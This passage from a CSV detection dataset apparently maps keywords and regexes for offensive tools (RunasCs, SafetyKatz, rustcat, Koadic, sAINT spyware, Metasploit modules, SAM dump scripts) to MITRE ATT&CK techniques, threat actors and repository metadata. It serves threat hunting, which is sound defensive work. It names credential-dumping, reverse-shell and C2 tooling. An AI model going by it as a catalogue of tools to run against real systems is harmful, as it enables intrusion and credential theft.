abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ruler -k -d * dump -o *",".{0,1000}\/ruler\s\-k\s\-d\s.{0,1000}\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ruler --url*",".{0,1000}\/ruler\s\-\-url.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/rulerforms.go*",".{0,1000}\/rulerforms\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/run/leet.pl*",".{0,1000}\/run\/leet\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/run/tor/socks*",".{0,1000}\/run\/tor\/socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/run/tor/tor.pid*",".{0,1000}\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/run_as_psh.*",".{0,1000}\/run_as_psh\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/RunasCs.cs*",".{0,1000}\/RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/runasppl.py*",".{0,1000}\/runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/RunAsWinTcb.git*",".{0,1000}\/RunAsWinTcb\.git.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/RunAsWinTcb.iml*",".{0,1000}\/RunAsWinTcb\.iml.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/runcalc.dll*",".{0,1000}\/runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/runcmd.lua*",".{0,1000}\/runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/runcmd2.lua*",".{0,1000}\/runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/rundll32.cmd*",".{0,1000}\/rundll32\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/rundll32_js*",".{0,1000}\/rundll32_js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/RunOF/RunOF/*",".{0,1000}\/RunOF\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/RunPEinMemory.exe*",".{0,1000}\/RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/RunPEinMemory64.exe*",".{0,1000}\/RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/runshellcode.*",".{0,1000}\/runshellcode\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/runswhide.lua*",".{0,1000}\/runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/RuralBishop.git*",".{0,1000}\/RuralBishop\.git.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*/rusers.nse*",".{0,1000}\/rusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rustcat/releases/latest/download/*",".{0,1000}\/rustcat\/releases\/latest\/download\/.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/rusthound.exe*",".{0,1000}\/rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*/RustHound.git*",".{0,1000}\/RustHound\.git.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 
- TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*/RustRedOps.git*",".{0,1000}\/RustRedOps\.git.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rvrsh3ll/*",".{0,1000}\/rvrsh3ll\/.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/RWXfinder.git*",".{0,1000}\/RWXfinder\.git.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*/S3cur3Th1sSh1t/*",".{0,1000}\/S3cur3Th1sSh1t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*/S3Scanner.git*",".{0,1000}\/S3Scanner\.git.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*/S4UTomato.git*",".{0,1000}\/S4UTomato\.git.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*/s7-info.nse*",".{0,1000}\/s7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/saefko.profile*",".{0,1000}\/saefko\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/Safer_PoC_CVE*",".{0,1000}\/Safer_PoC_CVE.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" 
"*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SafetyKatz.git*",".{0,1000}\/SafetyKatz\.git.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*/sAINT.git*",".{0,1000}\/sAINT\.git.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*/sAINT-master.zip*",".{0,1000}\/sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*/sam_dump_*.txt*",".{0,1000}\/sam_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/samba-vuln-cve-2012-1182.nse*",".{0,1000}\/samba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/samdump.go*",".{0,1000}\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/samdump2*",".{0,1000}\/samdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*/samruser.py*",".{0,1000}\/samruser\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/sandcat.git*",".{0,1000}\/sandcat\.git.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*/sap_default.txt*",".{0,1000}\/sap_default\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - 